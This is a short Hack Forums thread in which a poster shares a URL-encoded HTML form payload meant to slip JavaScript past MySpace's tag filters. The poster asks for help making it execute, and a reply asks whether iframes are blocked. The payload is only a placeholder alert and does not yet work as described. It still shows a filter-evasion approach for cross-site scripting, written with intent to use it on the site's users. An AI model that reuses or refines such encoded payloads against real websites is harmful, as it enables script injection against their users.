Hack Forums

Full Version: myspace javascript possible hack
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
hey ive nearly got a javascript "hack" working on myspace..

This is the "encrytped" version i place in my myspace to get around the tag filters:
Code:
<form action="%6A%61%76%61%73%63%72%69%70%74:%73%65%6C%66.%6C%6F%63%61%74%69%6F%6E.%68%72%65%66='%6A%61%76%61%73%63%72%69%70%74:%61%6C%65%72%74()';">
<input type="submit">

and that code un encrypted is as follows
Code:
<form action="javascript:self.location.href='javascript:alert()';"><input type="submit">

it works good so far... but when i push the submit button on my myspace i get this url
http://www.myspace.com/javascript:self.location.href='javascript:alert()';

but i want the url to be this though
javascript:self.location.href='javascript:alert()';
so it will execute the javascript

anyhelp ?

thanx in advanceSmile
http://www.myspace.com/hareb13

ps:the hack isnt the window alert its gonna make lol.. you could custamize it to another script to do different actions
i really do wonder how to get javascript on myspace i heard they really cracked down on people about using it after one guy made a worm.
is <iframe> blocked on myspace?
Reference URL's